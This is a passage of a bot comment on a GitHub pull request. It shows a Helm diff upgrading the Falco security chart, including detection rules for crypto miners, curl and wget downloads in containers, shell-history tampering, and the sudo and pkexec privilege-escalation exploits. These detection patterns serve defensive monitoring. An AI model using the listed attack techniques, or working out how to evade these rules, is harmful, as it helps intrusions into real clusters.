+      items: [rpm_binaries, deb_binaries, update-alternat, gem, npm, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
 
     - macro: package_mgmt_procs
       condition: proc.name in (package_mgmt_binaries)
@@ -710,7 +1155,7 @@
     # for efficiency.
     - macro: inbound_outbound
       condition: >
-        ((((evt.type in (accept,listen,connect) and evt.dir=<)) or
+        ((((evt.type in (accept,listen,connect) and evt.dir=<)) and
          (fd.typechar = 4 or fd.typechar = 6)) and
          (fd.ip != "0.0.0.0" and fd.net != "127.0.0.0/8") and
          (evt.rawres >= 0 or evt.res = EINPROGRESS))
@@ -938,7 +1383,7 @@
 
     # Qualys seems to run a variety of shell subprocesses, at various
     # levels. This checks at a few levels without the cost of a full
-    # proc.aname, which traverses the full parent heirarchy.
+    # proc.aname, which traverses the full parent hierarchy.
     - macro: run_by_qualys
       condition: >
         (proc.pname=qualys-cloud-ag or
@@ -1149,6 +1594,9 @@
     - macro: centrify_writing_krb
       condition: (proc.name in (adjoin,addns) and fd.name startswith /etc/krb5)
 
+    - macro: sssd_writing_krb
+      condition: (proc.name=adcli and proc.aname[2]=sssd and fd.name startswith /etc/krb5)
+
     - macro: cockpit_writing_conf
       condition: >
         ((proc.pname=cockpit-kube-la or proc.aname[2]=cockpit-kube-la)
@@ -1477,7 +1925,7 @@
       condition: (proc.name=oc and fd.name startswith /etc/origin/node)
 
     - macro: keepalived_writing_conf
-      condition: (proc.name=keepalived and fd.name=/etc/keepalived/keepalived.conf)
+      condition: (proc.name in (keepalived, kube-keepalived) and fd.name=/etc/keepalived/keepalived.conf)
 
     - macro: etcd_manager_updating_dns
       condition: (container and proc.name=etcd-manager and fd.name=/etc/hosts)
@@ -1592,6 +2040,7 @@
         and not nginx_writing_certs
         and not chef_client_writing_conf
         and not centrify_writing_krb
+        and not sssd_writing_krb
         and not cockpit_writing_conf
         and not ipsec_writing_conf
         and not httpd_writing_ssl_conf
@@ -2203,6 +2652,7 @@
         k8s.gcr.io/ip-masq-agent-amd64,
         k8s.gcr.io/kube-proxy,
         k8s.gcr.io/prometheus-to-sd,
+        public.ecr.aws/falcosecurity/falco,
         quay.io/calico/node,
         sysdig/sysdig,
         sematext_images
@@ -2231,7 +2681,7 @@
     - list: falco_sensitive_mount_images
       items: [
         docker.io/sysdig/sysdig, sysdig/sysdig,
-        docker.io/falcosecurity/falco, falcosecurity/falco,
+        docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco,
         gcr.io/google_containers/hyperkube,
         gcr.io/google_containers/kube-proxy, docker.io/calico/node,
         docker.io/rook/toolbox, docker.io/cloudnativelabs/kube-router, docker.io/consul,
@@ -2247,19 +2697,6 @@
                   container.image.repository in (falco_sensitive_mount_images) or
                   container.image.repository startswith quay.io/sysdig/)
 
-    # These container images are allowed to run with hostnetwork=true
-    - list: falco_hostnetwork_images
-      items: [
-        gcr.io/google-containers/prometheus-to-sd,
-        gcr.io/projectcalico-org/typha,
-        gcr.io/projectcalico-org/node,
-        gke.gcr.io/gke-metadata-server,
-        gke.gcr.io/kube-proxy,
-        gke.gcr.io/netd-amd64,
-        k8s.gcr.io/ip-masq-agent-amd64
-        k8s.gcr.io/prometheus-to-sd,
-        ]
-
     # Add conditions to this macro (probably in a separate file,
     # overwriting this macro) to specify additional containers that are
     # allowed to perform sensitive mounts.
@@ -2282,12 +2719,13 @@
 
     # For now, only considering a full mount of /etc as
     # sensitive. Ideally, this would also consider all subdirectories
-    # below /etc as well, but the globbing mechanism used by sysdig
+    # below /etc as well, but the globbing mechanism
     # doesn't allow exclusions of a full pattern, only single characters.
     - macro: sensitive_mount
       condition: (container.mount.dest[/proc*] != "N/A" or
                   container.mount.dest[/var/run/docker.sock] != "N/A" or
                   container.mount.dest[/var/run/crio/crio.sock] != "N/A" or
+                  container.mount.dest[/run/containerd/containerd.sock] != "N/A" or
                   container.mount.dest[/var/lib/kubelet] != "N/A" or
                   container.mount.dest[/var/lib/kubelet/pki] != "N/A" or
                   container.mount.dest[/] != "N/A" or
@@ -2574,7 +3012,7 @@
     #   output: "sshd sent error message to syslog (error=%evt.buffer)"
     #   priority: WARNING
 
-    - macro: somebody_becoming_themself
+    - macro: somebody_becoming_themselves
       condition: ((user.name=nobody and evt.arg.uid=nobody) or
                   (user.name=www-data and evt.arg.uid=www-data) or
                   (user.name=_apt and evt.arg.uid=_apt) or
@@ -2612,7 +3050,7 @@
         evt.type=setuid and evt.dir=>
         and (known_user_in_container or not container)
         and not (user.name=root or user.uid=0)
-        and not somebody_becoming_themself
+        and not somebody_becoming_themselves
         and not proc.name in (known_setuid_binaries, userexec_binaries, mail_binaries, docker_binaries,
                               nomachine_binaries)
         and not proc.name startswith "runc:"
@@ -2636,7 +3074,7 @@
         activity by any programs that can manage users, passwords, or permissions. sudo and su are excluded.
         Activity in containers is also excluded--some containers create custom users on top
         of a base linux distribution at startup.
-        Some innocuous commandlines that don't actually change anything are excluded.
+        Some innocuous command lines that don't actually change anything are excluded.
       condition: >
         spawned_process and proc.name in (user_mgmt_binaries) and
         not proc.name in (su, sudo, lastlog, nologin, unix_chkpwd) and not container and
@@ -2672,7 +3110,7 @@
       desc: creating any files below /dev other than known programs that manage devices. Some rootkits hide files in /dev.
       condition: >
         fd.directory = /dev and
-        (evt.type = creat or ((evt.type = open or evt.type = openat) and evt.arg.flags contains O_CREAT))
+        (evt.type = creat or (evt.type in (open,openat,openat2) and evt.arg.flags contains O_CREAT))
         and not proc.name in (dev_creation_binaries)
         and not fd.name in (allowed_dev_files)
         and not fd.name startswith /dev/tty
@@ -2686,7 +3124,7 @@
     # explicitly enumerate the container images that you want to allow
     # access to EC2 metadata. In this main falco rules file, there isn't
     # any way to know all the containers that should have access, so any
-    # container is alllowed, by repeating the "container" macro. In the
+    # container is allowed, by repeating the "container" macro. In the
     # overridden macro, the condition would look something like
     # (container.image.repository = vendor/container-1 or
     # container.image.repository = vendor/container-2 or ...)
@@ -2740,7 +3178,8 @@
          docker.io/sysdig/sysdig, docker.io/falcosecurity/falco,
          sysdig/sysdig, falcosecurity/falco,
          fluent/fluentd-kubernetes-daemonset, prom/prometheus,
-         ibm_cloud_containers)
+         ibm_cloud_containers,
+         public.ecr.aws/falcosecurity/falco)
          or (k8s.ns.name = "kube-system"))
 
     - macro: k8s_api_server
@@ -2948,15 +3387,15 @@
       condition: >
         (modify and (
           evt.arg.name contains "bash_history" or
-          evt.arg.name contains "zsh_history" or
+          evt.arg.name endswith "zsh_history" or
           evt.arg.name contains "fish_read_history" or
           evt.arg.name endswith "fish_history" or
           evt.arg.oldpath contains "bash_history" or
-          evt.arg.oldpath contains "zsh_history" or
+          evt.arg.oldpath endswith "zsh_history" or
           evt.arg.oldpath contains "fish_read_history" or
           evt.arg.oldpath endswith "fish_history" or
           evt.arg.path contains "bash_history" or
-          evt.arg.path contains "zsh_history" or
+          evt.arg.path endswith "zsh_history" or
           evt.arg.path contains "fish_read_history" or
           evt.arg.path endswith "fish_history"))
 
@@ -2964,7 +3403,7 @@
       condition: >
         (open_write and (
           fd.name contains "bash_history" or
-          fd.name contains "zsh_history" or
+          fd.name endswith "zsh_history" or
           fd.name contains "fish_read_history" or
           fd.name endswith "fish_history") and evt.arg.flags contains "O_TRUNC")
 
@@ -3003,7 +3442,7 @@
       items: [hyperkube, kubelet, k3s-agent]
 
     # This macro should be overridden in user rules as needed. This is useful if a given application
-    # should not be ignored alltogether with the user_known_chmod_applications list, but only in
+    # should not be ignored altogether with the user_known_chmod_applications list, but only in
     # specific conditions.
     - macro: user_known_set_setuid_or_setgid_bit_conditions
       condition: (never_true)
@@ -3082,8 +3521,18 @@
         create_symlink and
         (evt.arg.target in (sensitive_file_names) or evt.arg.target in (sensitive_directory_names))
       output: >
-        Symlinks created over senstivie files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
-      priority: NOTICE
+        Symlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
+      priority: WARNING
+      tags: [file, mitre_exfiltration]
+
+    - rule: Create Hardlink Over Sensitive Files
+      desc: Detect hardlink created over sensitive files
+      condition: >
+        create_hardlink and
+        (evt.arg.oldpath in (sensitive_file_names))
+      output: >
+        Hardlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.oldpath linkpath=%evt.arg.newpath parent_process=%proc.pname)
+      priority: WARNING
       tags: [file, mitre_exfiltration]
 
     - list: miner_ports
@@ -3179,7 +3628,7 @@
       condition: (evt.type in (sendto, sendmsg) and evt.dir=< and (fd.net != "127.0.0.0/8" and not fd.snet in (rfc_1918_addresses)) and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
 
     - macro: trusted_images_query_miner_domain_dns
-      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco))
+      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco))
       append: false
 
     # The rule is disabled by default.
@@ -3188,13 +3637,13 @@
       desc: Miners typically connect to miner pools on common ports.
       condition: net_miner_pool and not trusted_images_query_miner_domain_dns
       enabled: false
-      output: Outbound connection to IP/Port flagged by cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
+      output: Outbound connection to IP/Port flagged by https://cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [network, mitre_execution]
 
     - rule: Detect crypto miners using the Stratum protocol
       desc: Miners typically specify the mining pool to connect to with a URI that begins with 'stratum+tcp'
-      condition: spawned_process and proc.cmdline contains "stratum+tcp"
+      condition: spawned_process and (proc.cmdline contains "stratum+tcp" or proc.cmdline contains "stratum2+tcp" or proc.cmdline contains "stratum+ssl" or proc.cmdline contains "stratum2+ssl")
       output: Possible miner running (command=%proc.cmdline container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [process, mitre_execution]
@@ -3330,7 +3779,7 @@
 
     # The two Container Drift rules below will fire when a new executable is created in a container.
     # There are two ways to create executables - file is created with execution permissions or permissions change of existing file.
-    # We will use a new sysdig filter, is_open_exec, to find all files creations with execution permission, and will trace all chmods in a container.
+    # We will use a new filter, is_open_exec, to find all files creations with execution permission, and will trace all chmods in a container.
     # The use case we are targeting here is an attempt to execute code that was not shipped as part of a container (drift) -
     # an activity that might be malicious or non-compliant.
     # Two things to pay attention to:
@@ -3363,7 +3812,7 @@
     - rule: Container Drift Detected (open+create)
       desc: New executable created in a container due to open+create
       condition: >
-        evt.type in (open,openat,creat) and
+        evt.type in (open,openat,openat2,creat) and
         evt.is_open_exec=true and
         container and
         not runc_writing_exec_fifo and
@@ -3413,7 +3862,7 @@
     # A privilege escalation to root through heap-based buffer overflow
     - rule: Sudo Potential Privilege Escalation
       desc: Privilege escalation vulnerability affecting sudo (<= 1.9.5p2). Executing sudo using sudoedit -s or sudoedit -i command with command-line argument that ends with a single backslash character from an unprivileged user it's possible to elevate the user privileges to root.
-      condition: spawned_process and user.uid != 0 and proc.name=sudoedit and (proc.args contains -s or proc.args contains -i) and (proc.args contains "\ " or proc.args endswith \)
+      condition: spawned_process and user.uid != 0 and (proc.name=sudoedit or proc.name = sudo) and (proc.args contains -s or proc.args contains -i or proc.args contains --login) and (proc.args contains "\ " or proc.args endswith \)
       output: "Detect Sudo Privilege Escalation Exploit (CVE-2021-3156) (user=%user.name parent=%proc.pname cmdline=%proc.cmdline %container.info)"
       priority: CRITICAL
       tags: [filesystem, mitre_privilege_escalation]
@@ -3432,7 +3881,7 @@
       condition: (proc.args="" or proc.args intersects ("-V", "-l", "-h"))
 
     - rule: Mount Launched in Privileged Container
-      desc: Detect file system mount happened inside a privilegd container which might lead to container escape.
+      desc: Detect file system mount happened inside a privileged container which might lead to container escape.
       condition: >
         spawned_process and container
         and container.privileged=true
@@ -3460,6 +3909,51 @@
       priority: CRITICAL
       tags: [syscall, mitre_defense_evasion]
 
+    - list: ingress_remote_file_copy_binaries
+      items: [wget]
+
+    - macro: ingress_remote_file_copy_procs
+      condition: (proc.name in (ingress_remote_file_copy_binaries))
+
+    # Users should overwrite this macro to specify conditions under which a
+    # Custom condition for use of ingress remote file copy tool in container
+    - macro: user_known_ingress_remote_file_copy_activities
+      condition: (never_true)
+
+    -  macro: curl_download
+       condition: proc.name = curl and
+                  (proc.cmdline contains " > " or
+                  proc.cmdline contains " >> " or
+                  proc.cmdline contains " | " or
+                  proc.cmdline contains " -o " or
+                  proc.cmdline contains " --output " or
+                  proc.cmdline contains " -O " or
+                  proc.cmdline contains " --remote-name ")
+
+    - rule: Launch Ingress Remote File Copy Tools in Container
+      desc: Detect ingress remote file copy tools launched in container
+      condition: >
+        spawned_process and
+        container and
+        (ingress_remote_file_copy_procs or curl_download) and
+        not user_known_ingress_remote_file_copy_activities
+      output: >
+        Ingress remote file copy tool launched in container (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline parent_process=%proc.pname
+        container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
+      priority: NOTICE
+      tags: [network, process, mitre_command_and_control]
+
+    # This rule helps detect CVE-2021-4034:
+    # A privilege escalation to root through memory corruption
+    - rule: Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034)
+      desc: "This rule detects an attempt to exploit a privilege escalation vulnerability in Polkit's pkexec. By running specially crafted code, a local user can leverage this flaw to gain root privileges on a compromised system"
+      condition:
+        spawned_process and user.uid != 0 and proc.name=pkexec and proc.args = ''
+      output:
+        "Detect Polkit pkexec Local Privilege Escalation Exploit (CVE-2021-4034) (user=%user.loginname uid=%user.loginuid command=%proc.cmdline args=%proc.args)"
+      priority: CRITICAL
+      tags: [process, mitre_privilege_escalation]
+
     # Application rules have moved to application_rules.yaml. Please look
     # there if you want to enable them by adding to
     # falco_rules.local.yaml.
@@ -3618,6 +4112,19 @@
       source: k8s_audit
       tags: [k8s]
 
+    # These container images are allowed to run with hostnetwork=true
+    - list: falco_hostnetwork_images
+      items: [
+        gcr.io/google-containers/prometheus-to-sd,
+        gcr.io/projectcalico-org/typha,
+        gcr.io/projectcalico-org/node,
+        gke.gcr.io/gke-metadata-server,
+        gke.gcr.io/kube-proxy,
+        gke.gcr.io/netd-amd64,
+        k8s.gcr.io/ip-masq-agent-amd64
+        k8s.gcr.io/prometheus-to-sd,
+        ]
+
     # Corresponds to K8s CIS Benchmark 1.7.4
     - rule: Create HostNetwork Pod
       desc: Detect an attempt to start a pod using the host network.
@@ -3741,7 +4248,7 @@
         k8s.gcr.io/kube-apiserver,
         gke.gcr.io/kube-proxy,
         gke.gcr.io/netd-amd64,
-        k8s.gcr.io/addon-resizer
+        k8s.gcr.io/addon-resizer,
         k8s.gcr.io/prometheus-to-sd,
         k8s.gcr.io/k8s-dns-dnsmasq-nanny-amd64,
         k8s.gcr.io/k8s-dns-kube-dns-amd64,
@@ -3768,9 +4275,31 @@
       items: []
 
     - list: known_sa_list
-      items: ["pod-garbage-collector","resourcequota-controller","cronjob-controller","generic-garbage-collector",
-              "daemon-set-controller","endpointslice-controller","deployment-controller", "replicaset-controller",
-              "endpoint-controller", "namespace-controller", "statefulset-controller", "disruption-controller"]
+      items: [
+        coredns,
+        coredns-autoscaler,
+        cronjob-controller,
+        daemon-set-controller,
+        deployment-controller,
+        disruption-controller,
+        endpoint-controller,
+        endpointslice-controller,
+        endpointslicemirroring-controller,
+        generic-garbage-collector,
+        horizontal-pod-autoscaler,
+        job-controller,
+        namespace-controller,
+        node-controller,
+        persistent-volume-binder,
+        pod-garbage-collector,
+        pv-protection-controller,
+        pvc-protection-controller,
+        replicaset-controller,
+        resourcequota-controller,
+        root-ca-cert-publisher,
+        service-account-controller,
+        statefulset-controller
+        ]
 
     - macro: trusted_sa
       condition: (ka.target.name in (known_sa_list, user_known_sa_list))
@@ -3797,7 +4326,7 @@
       tags: [k8s]
 
     # Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
-    # (exapand this to any built-in cluster role that does "sensitive" things)
+    # (expand this to any built-in cluster role that does "sensitive" things)
     - rule: Attach to cluster-admin Role
       desc: Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
       condition: kevt and clusterrolebinding and kcreate and ka.req.binding.role=cluster-admin
@@ -4003,7 +4532,7 @@
     # cluster creation. This may signify a permission setting too broader.
     # As we can't check for role of the user on a general ka.* event, this
     # may or may not be an administrator. Customize the full_admin_k8s_users
-    # list to your needs, and activate at your discrection.
+    # list to your needs, and activate at your discretion.
 
     # # How to test:
     # # Execute any kubectl command connected using default cluster user, as:
@@ -4184,8 +4713,8 @@
         app: falco
         role: security
       annotations:
-        checksum/config: 9ac2b16de3ea0caa56e07879f0d383db5a400f1e84c2e04d5f2cec53f8b23a4a
-        checksum/rules: 4fead7ed0d40bd6533c61315bc4089d124976d46b052192f768b9c97be5d405e
+        checksum/config: cfa18541d5243a25e22b1266162a119df07b7063b833909cdba22b3a6204ccf1
+        checksum/rules: 83f9e23d1f49c0a82b7b93bb05f68eecd5d7133e90fb593ddeb9295f58df8d6c
         checksum/certs: 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
     spec:
       serviceAccountName: falco
@@ -4196,7 +4725,7 @@
           operator: Exists
       containers:
         - name: falco
-          image: public.ecr.aws/falcosecurity/falco:0.30.0
+          image: public.ecr.aws/falcosecurity/falco:0.31.1
           imagePullPolicy: IfNotPresent
           resources:
             limits:
@@ -4211,11 +4740,14 @@
             - /usr/bin/falco
             - --cri
             - /run/containerd/containerd.sock
+            - --cri
+            - /run/crio/crio.sock
             - -K
             - /var/run/secrets/kubernetes.io/serviceaccount/token
             - -k
             - https://$(KUBERNETES_SERVICE_HOST)
-            - --k8s-node="${FALCO_K8S_NODE_NAME}"
+            - --k8s-node
+            - "$(FALCO_K8S_NODE_NAME)"
             - -pk
           env:
             - name: FALCO_K8S_NODE_NAME
@@ -4243,6 +4775,8 @@
           volumeMounts:
             - mountPath: /host/run/containerd/containerd.sock
               name: containerd-socket
+            - mountPath: /host/run/crio/crio.sock
+              name: crio-socket
             - mountPath: /host/dev
               name: dev-fs
               readOnly: true
@@ -4270,6 +4804,9 @@
         - name: containerd-socket
           hostPath:
             path: /var/run/k3s/containerd/containerd.sock
+        - name: crio-socket
+          hostPath:
+            path: /run/crio/crio.sock
         - name: dev-fs
           hostPath:
             path: /dev
@@ -4300,6 +4837,8 @@
                 path: falco_rules.local.yaml
               - key: application_rules.yaml
                 path: rules.available/application_rules.yaml
+              - key: aws_cloudtrail_rules.yaml
+                path: aws_cloudtrail_rules.yaml
         - name: rules-volume
           configMap:
             name: falco-rules

@renovate renovate bot changed the title chore(deps): update helm release falco to v1.18.5 chore(deps): update helm release falco to v1.18.6 Jun 7, 2022
@github-actions
Copy link
Contributor

github-actions bot commented Jun 7, 2022

Path: cluster/apps/security/falco-system/falco/helm-release.yaml
Version: 1.16.0 -> 1.18.6

@@ -153,7 +153,7 @@
     release: "falco"
     heritage: "Helm"
 data:
-  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/k8s_audit_rules.yaml\n  - /etc/falco/rules.d\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. \"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. When falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - \"ignore\": do nothing. If an empty list is provided, ignore is assumed.\n#   - \"log\": log a CRITICAL message noting that the buffer was full.\n#   - \"alert\": emit a falco alert noting that the buffer was full.\n#   - \"exit\": exit falco with a non-zero rc.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. The rate corresponds to one message every 30 seconds\n# with a burst of 10 messages.\nsyscall_event_drops:\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 10\n\n# Falco continuously monitors outputs performance. When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\n\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\n\nsyslog_output:\n  enabled: true\n\n# If keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\n\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\n\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_audit_endpoint: /k8s-audit\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/server.pem\n\n# Possible additional things you might want to do with program output:\n#   - send to a slack webhook:\n#         program: \"\\\"jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX\\\"\"\n#   - logging (alternate method than syslog):\n#         program: logger -t falco-test\n#   - send over a network connection:\n#         program: nc host.example.com 80\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: http://falco-sidekick-falcosidekick:2801\n\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
+  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/k8s_audit_rules.yaml\n  - /etc/falco/rules.d\n\nplugins:\n    - init_config: \"\"\n      library_path: libcloudtrail.so\n      name: cloudtrail\n      open_params: \"\"\n    - init_config: \"\"\n      library_path: libjson.so\n      name: json\n\n# Setting this list to empty ensures that the above plugins are *not*\n# loaded and enabled by default. If you want to use the above plugins,\n# set a meaningful init_config/open_params for the cloudtrail plugin\n# and then change this to:\n# load_plugins: [cloudtrail, json]\nload_plugins:\n    []\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. \"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. When Falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - ignore: do nothing (default when list of actions is empty)\n#   - log: log a DEBUG message noting that the buffer was full\n#   - alert: emit a Falco alert noting that the buffer was full\n#   - exit: exit Falco with a non-zero rc\n#\n# Notice it is not possible to ignore and log/alert messages at the same time.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. The rate corresponds to one message every 30 seconds\n# with a burst of one message (by default).\n#\n# The messages are emitted when the percentage of dropped system calls\n# with respect the number of events in the last second\n# is greater than the given threshold (a double in the range [0, 1]).\n#\n# For debugging/testing it is possible to simulate the drops using\n# the `simulate_drops: true`. In this case the threshold does not apply.\nsyscall_event_drops:\n  threshold: 0.1\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 1\n\n# Falco uses a shared buffer between the kernel and userspace to receive\n# the events (eg., system call information) in userspace.\n#\n# Anyways, the underlying libraries can also timeout for various reasons.\n# For example, there could have been issues while reading an event.\n# Or the particular event needs to be skipped.\n# Normally, it's very unlikely that Falco does not receive events consecutively.\n#\n# Falco is able to detect such uncommon situation.\n#\n# Here you can configure the maximum number of consecutive timeouts without an event\n# after which you want Falco to alert.\n# By default this value is set to 1000 consecutive timeouts without an event at all.\n# How this value maps to a time interval depends on the CPU frequency.\nsyscall_event_timeouts:\n  max_consecutives: 1000\n\n# Falco continuously monitors outputs performance. When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\nsyslog_output:\n  enabled: true\n\n# If 